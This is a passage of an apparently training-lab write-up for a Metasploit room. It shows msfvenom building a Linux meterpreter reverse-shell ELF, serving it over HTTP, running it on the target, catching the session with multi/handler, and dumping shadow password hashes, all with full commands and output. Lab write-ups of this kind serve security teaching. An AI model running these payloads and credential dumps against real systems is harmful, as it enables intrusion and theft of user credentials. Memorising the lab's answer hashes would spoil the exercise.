Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pirate:1001:aad3b435b51404eeaad3b435b51404ee:8ce9a3ebd1647fcc5e04025019f4b875:::


[*] Post module execution completed

Answer : 8ce9a3ebd1647fcc5e04025019f4b875

TASK 6 : Msfvenom

Launch the VM attached to this task. The username is murphy, and the password is 1q2w3e4r. You can connect via SSH or launch this machine in the browser. Once on the terminal, type “sudo su” to get a root shell, this will make things easier.

No Answer

Create a meterpreter payload in the .elf format.

1
2
3
4
5
6
root@ip-10-10-196-135:~/Desktop/msexploit# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.196.135 LPORT=7777 --platform linux -f elf -o shell.elf
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
Saved as: shell.elf

The first payload i created doesn’t work so i use a venom-builder https://pentest.ws/tools/venom-builder to have the exact syntax to use like above and the msfconsole launch command.

No Answer

ransfer it to the target machine (you can start a Python web server on your attacking machine with the python3 -m http.server 9000 command and use wget http://ATTACKING_MACHINE_IP:9000/shell.elf to download it to the target machine).

On Kali machine :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@ip-10-10-196-135:~/Desktop/msexploit# nano pyserver.py

import http.server
import socketserver

PORT = 7000
Handler = http.server.SimpleHTTPRequestHandler

with socketserver.TCPServer(("", PORT), Handler) as http:
    print("serving at port", PORT)
    http.serve_forever()

root@ip-10-10-196-135:~/Desktop/msexploit# python3 pyserver.py 
serving at port 9000
10.10.55.92 - - [26/Sep/2021 10:37:52] "GET /rev_shell2.elf HTTP/1.1" 200 -

On Target ssh session :

1
2
3
4
5
6
7
8
9
10
root@ip-10-10-55-92:/tmp# wget http://10.10.196.135:9000/shell.elf
--2021-09-26 09:53:50--  http://10.10.196.135:9000/shell.elf
Connecting to 10.10.196.135:9000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207 [application/octet-stream]
Saving to: \u2018shell.elf\u2019

shell.elf                     100%[==============================================>]     207  --.-KB/s    in 0s      

2021-09-26 09:53:50 (12.6 MB/s) - \u2018shell.elf\u2019 saved [207/207]

No Answer

Get a meterpreter session on the target machine.

On Kali machine :

1
root@ip-10-10-196-135:~/Desktop/msexploit# msfconsole -x "use exploit/multi/handler; set PAYLOAD linux/x86/meterpreter/reverse_tcp; set LHOST 10.10.196.135; set LPORT 7777; run"

on target machine :

1
2
root@ip-10-10-55-92:/tmp# chmod +x rev_shell2.elf
root@ip-10-10-55-92:/tmp# ./rev_shell2.elf

On KALI we got a meterpreter :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
[...]
       =[ metasploit v5.0.101-dev                         ]
+ -- --=[ 2048 exploits - 1105 auxiliary - 344 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: You can use help to view all available commands

[*] Using configured payload generic/shell_reverse_tcp
PAYLOAD => linux/x86/meterpreter/reverse_tcp
LHOST => 10.10.196.135
LPORT => 7777
[*] Started reverse TCP handler on 10.10.196.135:7777 
[*] Sending stage (980808 bytes) to 10.10.55.92
[*] Meterpreter session 1 opened (10.10.196.135:7777 -> 10.10.55.92:54228) at 2021-09-26 10:56:30 +0100

meterpreter >

No Answer

Use a post exploitation module to dump hashes of other users on the system.

We can use the linux/gather/hashdump module option find with the search option of metasploit :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
meterpreter > 
Background session 1? [y/N]  y
[-] Unknown command: y.
msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                                                       Connection
  --  ----  ----                   -----------                                                                       ----------
  1         meterpreter x86/linux  no-user @ ip-10-10-55-92 (uid=0, gid=0, euid=0, egid=0) @ ip-10-10-55-92.eu-w...  10.10.196.135:7777 -> 10.10.55.92:54228 (10.10.55.92)

msf5 exploit(multi/handler) > use linux/gather/hashdump
msf5 post(linux/gather/hashdump) > show options

Module options (post/linux/gather/hashdump):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

msf5 post(linux/gather/hashdump) > set session 1
session => 1
msf5 post(linux/gather/hashdump) > run

[+] murphy:$6$qK0Kt4UO$HuCrlOJGbBJb5Av9SL7rEzbxcz/KZYFkMwUqAE0ZMDpNRmOHhPHeI2JU3m9OBOS7lUKkKMADLxCBcywzIxl7b.:1001:1001::/home/murphy:/bin/sh
[+] claire:$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0:1002:1002::/home/claire:/bin/sh
[+] Unshadowed Password File: /root/.msf4/loot/20210926110318_default_10.10.55.92_linux.hashes_221290.txt
[*] Post module execution completed

No Answer

What is the other user’s password hash ?

Answer :

1
$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0

TASK 7 : Summary

No answer needed.

No Answer

This post is licensed under CC BY 4.0 by the author.